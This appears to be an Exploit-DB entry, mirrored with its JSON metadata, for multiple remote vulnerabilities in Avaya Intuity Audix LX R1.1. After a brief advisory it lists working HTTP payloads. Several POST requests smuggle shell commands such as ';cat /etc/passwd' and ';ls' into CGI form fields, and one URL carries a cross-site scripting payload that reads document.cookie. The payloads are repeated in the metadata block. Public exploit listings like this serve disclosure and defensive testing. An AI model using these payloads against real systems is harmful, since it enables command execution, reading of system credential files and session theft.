Search...

Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities

2009-09-18T00:00:00

ID EDB-ID:33231
Type exploitdb
Reporter pagvac
Modified 2009-09-18T00:00:00

Description

Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/36450/info

Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:

1. Multiple remote command-execution vulnerabilities
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability

Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. 

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56

POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=;cat+/etc/passwd

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1;ls&size_p=56

POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
ipadd=&count_p=1&size_p=56&opt_n=;ls

POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1
host_or_ip=127.0.0.1&r_type=;ls;

https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/
title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

JSON Vulners Source

Initial Source

{"id": "EDB-ID:33231", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities", "description": "Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities. Webapps exploit for cgi platform", "published": "2009-09-18T00:00:00", "modified": "2009-09-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/33231/", "reporter": "pagvac", "references": [], "cvelist": [], "lastseen": "2016-02-03T18:45:58", "viewCount": 5, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-02-03T18:45:58", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-03T18:45:58", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/33231/", "sourceData": "source: http://www.securityfocus.com/bid/36450/info\r\n\r\nAvaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:\r\n\r\n1. Multiple remote command-execution vulnerabilities\r\n2. A cross-site request-forgery vulnerability\r\n3. A cross-site scripting vulnerability\r\n\r\nAttackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. \r\n\r\nPOST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1\r\nipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56\r\n\r\nPOST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1\r\nipadd=;cat+/etc/passwd\r\n\r\nPOST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1\r\nipadd=&count_p=1;ls&size_p=56\r\n\r\nPOST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1\r\nipadd=&count_p=1&size_p=56&opt_n=;ls\r\n\r\nPOST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1\r\nhost_or_ip=127.0.0.1&r_type=;ls;\r\n\r\nhttps://www.example.com/cgi-bin/smallmenu.pl?url=%3C/\r\ntitle%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E", "osvdbidlist": []}